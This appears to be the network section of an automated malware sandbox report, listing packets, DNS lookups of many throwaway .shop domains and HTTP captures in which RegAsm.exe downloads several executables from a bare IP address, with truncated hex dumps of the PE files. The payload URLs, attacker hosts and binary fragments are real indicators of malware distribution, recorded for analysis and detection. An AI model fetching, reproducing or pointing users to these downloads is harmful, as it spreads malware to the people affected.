Sep 27, 2024 01:50:36.644284010 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.644337893 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.644377947 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.644395113 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.644596100 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.651961088 CEST	443	49765	188.114.96.3	192.168.2.8
Sep 27, 2024 01:50:36.652055025 CEST	443	49765	188.114.96.3	192.168.2.8
Sep 27, 2024 01:50:36.652241945 CEST	49765	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:50:36.658714056 CEST	49765	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:50:36.666008949 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666081905 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666088104 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.666115046 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666141987 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.666169882 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.666407108 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666451931 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666471958 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.666480064 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.666512966 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.666529894 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.667457104 CEST	49763	80	192.168.2.8	104.26.12.205
Sep 27, 2024 01:50:36.667840004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:50:36.689297915 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689343929 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689394951 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689419985 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689444065 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689452887 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689460039 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689483881 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689498901 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689529896 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689588070 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689632893 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689681053 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689727068 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.689743042 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.689771891 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.704272032 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.704325914 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.704401970 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.704649925 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.704658985 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.347042084 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.349195957 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.349622011 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.349634886 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.351423025 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.351428032 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.351450920 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.351454973 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.749675035 CEST	49767	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.749728918 CEST	443	49767	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:37.749797106 CEST	49767	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.750020027 CEST	49767	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:37.750040054 CEST	443	49767	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.084841013 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.084928989 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:38.084959030 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.085026026 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:38.085032940 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.085088968 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:38.085911989 CEST	49766	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:38.085932016 CEST	443	49766	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.462340117 CEST	443	49767	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:38.462414980 CEST	49767	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:39.388894081 CEST	49767	443	192.168.2.8	5.75.211.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 01:49:10.783134937 CEST	63784	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:10.789747953 CEST	53	63784	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:49.903557062 CEST	63899	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:50.020638943 CEST	53	63899	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:51.172573090 CEST	59567	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:51.183939934 CEST	53	59567	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:52.089726925 CEST	60496	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:52.102792025 CEST	53	60496	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:53.080733061 CEST	64811	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:53.092920065 CEST	53	64811	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:54.056406975 CEST	50316	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:54.068825006 CEST	53	50316	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:55.121783972 CEST	63771	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:55.134999990 CEST	53	63771	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:56.244657040 CEST	54463	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:56.258297920 CEST	53	54463	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:56.899168015 CEST	65163	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:56.907226086 CEST	53	65163	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:57.210012913 CEST	65460	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:57.223443031 CEST	53	65460	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:58.150216103 CEST	61357	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:58.161808014 CEST	53	61357	1.1.1.1	192.168.2.8
Sep 27, 2024 01:49:59.571933031 CEST	57861	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:49:59.578531027 CEST	53	57861	1.1.1.1	192.168.2.8
Sep 27, 2024 01:50:00.853620052 CEST	51664	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:50:00.865941048 CEST	53	51664	1.1.1.1	192.168.2.8
Sep 27, 2024 01:50:23.583884954 CEST	63884	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:50:23.591161013 CEST	53	63884	1.1.1.1	192.168.2.8
Sep 27, 2024 01:50:34.675549984 CEST	64714	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:50:34.683126926 CEST	53	64714	1.1.1.1	192.168.2.8
Sep 27, 2024 01:50:35.662424088 CEST	57290	53	192.168.2.8	1.1.1.1
Sep 27, 2024 01:50:35.674915075 CEST	53	57290	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 01:49:10.783134937 CEST	192.168.2.8	1.1.1.1	0x2aca	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:49.903557062 CEST	192.168.2.8	1.1.1.1	0xba6d	Standard query (0)	wallkedsleeoi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:51.172573090 CEST	192.168.2.8	1.1.1.1	0x7b0	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:52.089726925 CEST	192.168.2.8	1.1.1.1	0xad83	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:53.080733061 CEST	192.168.2.8	1.1.1.1	0x7592	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:54.056406975 CEST	192.168.2.8	1.1.1.1	0xef76	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:55.121783972 CEST	192.168.2.8	1.1.1.1	0x8745	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:56.244657040 CEST	192.168.2.8	1.1.1.1	0xa0c0	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:56.899168015 CEST	192.168.2.8	1.1.1.1	0x49f9	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:57.210012913 CEST	192.168.2.8	1.1.1.1	0xabc8	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:58.150216103 CEST	192.168.2.8	1.1.1.1	0x3491	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:59.571933031 CEST	192.168.2.8	1.1.1.1	0xfc65	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:00.853620052 CEST	192.168.2.8	1.1.1.1	0xea33	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:23.583884954 CEST	192.168.2.8	1.1.1.1	0xa62c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:34.675549984 CEST	192.168.2.8	1.1.1.1	0x3793	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:35.662424088 CEST	192.168.2.8	1.1.1.1	0xe607	Standard query (0)	hansgborn.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 01:49:10.789747953 CEST	1.1.1.1	192.168.2.8	0x2aca	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:50.020638943 CEST	1.1.1.1	192.168.2.8	0xba6d	No error (0)	wallkedsleeoi.shop	104.21.36.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:50.020638943 CEST	1.1.1.1	192.168.2.8	0xba6d	No error (0)	wallkedsleeoi.shop	172.67.194.216	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:51.183939934 CEST	1.1.1.1	192.168.2.8	0x7b0	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:51.183939934 CEST	1.1.1.1	192.168.2.8	0x7b0	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:52.102792025 CEST	1.1.1.1	192.168.2.8	0xad83	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:52.102792025 CEST	1.1.1.1	192.168.2.8	0xad83	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:53.092920065 CEST	1.1.1.1	192.168.2.8	0x7592	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:53.092920065 CEST	1.1.1.1	192.168.2.8	0x7592	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:54.068825006 CEST	1.1.1.1	192.168.2.8	0xef76	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:54.068825006 CEST	1.1.1.1	192.168.2.8	0xef76	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:55.134999990 CEST	1.1.1.1	192.168.2.8	0x8745	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:55.134999990 CEST	1.1.1.1	192.168.2.8	0x8745	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:56.258297920 CEST	1.1.1.1	192.168.2.8	0xa0c0	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:56.258297920 CEST	1.1.1.1	192.168.2.8	0xa0c0	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:56.907226086 CEST	1.1.1.1	192.168.2.8	0x49f9	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:57.223443031 CEST	1.1.1.1	192.168.2.8	0xabc8	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:57.223443031 CEST	1.1.1.1	192.168.2.8	0xabc8	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:58.161808014 CEST	1.1.1.1	192.168.2.8	0x3491	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:58.161808014 CEST	1.1.1.1	192.168.2.8	0x3491	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:49:59.578531027 CEST	1.1.1.1	192.168.2.8	0xfc65	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:00.865941048 CEST	1.1.1.1	192.168.2.8	0xea33	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:00.865941048 CEST	1.1.1.1	192.168.2.8	0xea33	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:23.591161013 CEST	1.1.1.1	192.168.2.8	0xa62c	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:34.683126926 CEST	1.1.1.1	192.168.2.8	0x3793	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:34.683126926 CEST	1.1.1.1	192.168.2.8	0x3793	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:34.683126926 CEST	1.1.1.1	192.168.2.8	0x3793	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:35.674915075 CEST	1.1.1.1	192.168.2.8	0xe607	No error (0)	hansgborn.eu	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:50:35.674915075 CEST	1.1.1.1	192.168.2.8	0xe607	No error (0)	hansgborn.eu	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

wallkedsleeoi.shop

gutterydhowi.shop

ghostreedmnu.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

ballotnwu.site

hansgborn.eu

147.45.44.104

cowod.hopto.org

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49734	147.45.44.104	80	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:49:48.256485939 CEST	195	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 01:49:48.876780033 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:48 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 01:49:48.876796007 CEST	224	IN	Data Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87 Data Ascii: 8WPaG?UK%9]\|wc\\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(s
Sep 27, 2024 01:49:48.876822948 CEST	1236	IN	Data Raw: 78 e7 9d 1e 5f 2f b8 92 75 39 fc c3 b2 b9 62 c3 4f 5b 1f 70 6b 15 25 37 ab da 17 8b 4b 9a 27 05 cb e6 0c 9d 35 7f 58 60 d5 ad 85 8a 92 5f 79 18 cf 35 8f 7f 5b fe 6e 3c 7e ff 95 ba e3 6e c7 0d 89 04 8f 3e 69 27 25 68 d2 f4 1e b8 d7 88 6e 5f 75 ee Data Ascii: x_/u9bO[pk%7K'5X`_y5[n<~n>i'%hn_uRX0lvrJy,7)s;E4nv\|]5jK~ [ga`vOQ$N8WH <O$qXt+i(iG,)4B&^
Sep 27, 2024 01:49:48.876841068 CEST	1236	IN	Data Raw: dc 6b d9 68 84 e9 2a 73 94 3a a3 09 74 c5 94 e3 1d 03 5d e1 0b fd 5c 5b a7 4d a2 dd 78 0b 4b 0f c8 0c 54 a4 68 19 08 3b 3e 76 39 1e 6a 6e 92 a2 69 58 df b4 9a bc 23 6f 03 98 8a 89 d4 a7 d4 85 bc 55 3e fc 4c e0 54 17 3c 92 75 f1 1c 6b 2d 0e 27 dd Data Ascii: kh*s:t]\[MxKTh;>v9jniX#oU>LT<uk-'BwFF!D@qg]!Ni@jP2jswi}:Xd9j,;F@9Ar?OG!>3UDpL&EyY3e${>
Sep 27, 2024 01:49:48.876852036 CEST	448	IN	Data Raw: 1e 24 06 99 fc 20 c4 cb b9 c7 87 89 76 03 56 90 a6 0a 95 71 f0 87 77 09 f5 a1 2d 9d 29 12 14 59 2c 3f c1 06 40 f2 9e 74 50 36 07 19 cc a3 6c 2b 11 02 6f 58 a5 c3 a9 47 d1 43 d2 a1 68 bc 5f 7c 52 05 07 65 94 24 b5 38 9f f7 3b 7c a0 2e 75 14 41 bc Data Ascii: $ vVqw-)Y,?@tP6l+oXGCh_\|Re$8;\|.uA0rE}D{zT%aYj\|]FHXkCR>ALDi?EtbY$Gs#vP)C+A<\|3fU8)rkqu)tuFj5Tro
Sep 27, 2024 01:49:48.876863956 CEST	1236	IN	Data Raw: 49 53 7a 57 c9 fb 43 8b 37 ea 72 20 52 24 d7 9e d4 8f e6 a7 bd d2 a7 83 da eb 06 c9 2b e4 ef c9 3c 9d 02 60 d2 03 bf 8d b7 08 a8 71 c1 68 c4 0b 4c 07 29 a6 3b e9 97 12 1b 67 f6 ea eb 5f c6 68 e6 04 39 e8 c2 30 bb a0 71 40 ac 4a 68 c0 c7 4c 45 19 Data Ascii: ISzWC7r R$+<`qhL);g_h90q@JhLEO-znp)?VN)`U]._\23@#(_S5JD.X1f}lC6p{W=4rS0X0#2m~S
Sep 27, 2024 01:49:48.876874924 CEST	1236	IN	Data Raw: b4 4c 9e 1f 6c 64 b5 17 7d a3 18 9b 75 e0 e1 5b 68 d5 6b e4 6a c5 5b bc 16 91 91 1f 28 3b 07 fb c6 b4 75 4f 09 90 14 7e 96 ba ff 28 ee cd 78 b3 ca 29 97 47 ab 3a 65 97 ad 63 10 77 ce b7 f9 0f cd e6 1e fc 89 01 bc cd b0 60 f5 82 41 6d 09 3d 80 2c Data Ascii: Lld}u[hkj[(;uO~(x)G:ecw`Am=,~[sk]:*,;n9,:SedY6H3}.L.\|wO[dM1SYBaYI)G3&FwW/gIaUU870_!ZB[%nS;r9K\|1$11qJ
Sep 27, 2024 01:49:48.876887083 CEST	1236	IN	Data Raw: 2f 24 65 19 45 6e 27 58 ba 6a eb 6c 88 cc d0 c4 e8 4e 97 7f 60 e9 4c 06 1a 47 da e4 1f fd f0 1a 20 bf f7 e1 57 ce 08 6b dd dd 9f 21 6c 01 8d 02 c6 91 e7 c9 79 10 6c c5 7e c2 ec 79 66 4c f4 63 0c 8f 14 e5 26 72 74 cf c9 96 76 df 46 11 3d 2f 8f 9c Data Ascii: /$eEn'XjlN`LG Wk!lyl~yfLc&rtvF=/8cXCXx'o}$;5\*x<BG#lVBE6-O_U(WwVZah=qE A%i~=^x5[4^jFb6mH9K[D0z[VjG41F
Sep 27, 2024 01:49:48.876903057 CEST	104	IN	Data Raw: 29 e1 e8 2c bb 33 b7 c2 bf 08 69 d3 92 3a 93 a6 8f 4b 9c 00 00 05 cd 7a f0 17 50 d0 0a b5 5e e3 97 1d cd 2a 4d 2d 78 0f 02 78 02 2b 81 1b f5 7b 4f 99 9e 4d 87 a3 77 60 3b d5 27 e7 36 91 dc 6e 9a b6 1b c2 0c 9a 0d f3 fa 9b 4a 0d 0a 41 a9 67 a0 ed Data Ascii: ),3i:KzP^*M-xx+{OMw`;'6nJAg zIu(Q@w8g
Sep 27, 2024 01:49:48.876914978 CEST	1236	IN	Data Raw: a2 a2 20 c4 dd 31 7b 0d 5d a6 48 4d 07 49 45 d3 4e 22 6e 2d 82 f7 ec 90 69 d4 4a 6a 2f b4 ba b5 14 2f dc 86 1f a2 1a 13 a4 82 c0 7a 3c fe ac 94 88 9d b2 94 e2 0c 62 4a 32 32 93 ad 37 a1 c2 0a fe 6f 1c 29 9e a6 3c bb e9 09 de 30 9d 64 cd 57 e8 ed Data Ascii: 1{]HMIEN"n-iJj//z<bJ227o)<0dW ;7jqz1zuGQ9vTE)NFNUiZ{{M!xzU!Y/3+,?1{=jh70D%3="PQ5~%HqBBltK&(
Sep 27, 2024 01:49:48.881728888 CEST	1236	IN	Data Raw: 56 79 e7 2f d1 ec ec 30 66 b9 4c a0 81 ce 3b 60 db 1d cc 6a 5a 93 c9 1b 2a 85 5c da 55 d2 39 e0 d8 4b 9b eb f8 27 a4 1d 36 da 61 ba 44 9f 14 7f a2 2d 60 88 89 05 5d a9 1a f1 cc f0 f3 b0 34 cd 93 64 4c f2 ad e0 bf e8 6e 2d e3 e8 f3 9b 5d 9b 1c a5 Data Ascii: Vy/0fL;`jZ\U9K'6aD-`]4dLn-]Hc7W5eXz=:0{wa:28W@?RL(&jt;b2L5nx pp}<9B,t6j0Zvi5@KsLPNU75]d
Sep 27, 2024 01:49:51.106713057 CEST	192	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 01:49:51.289612055 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:51 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 01:49:53.299165964 CEST	188	OUT	GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
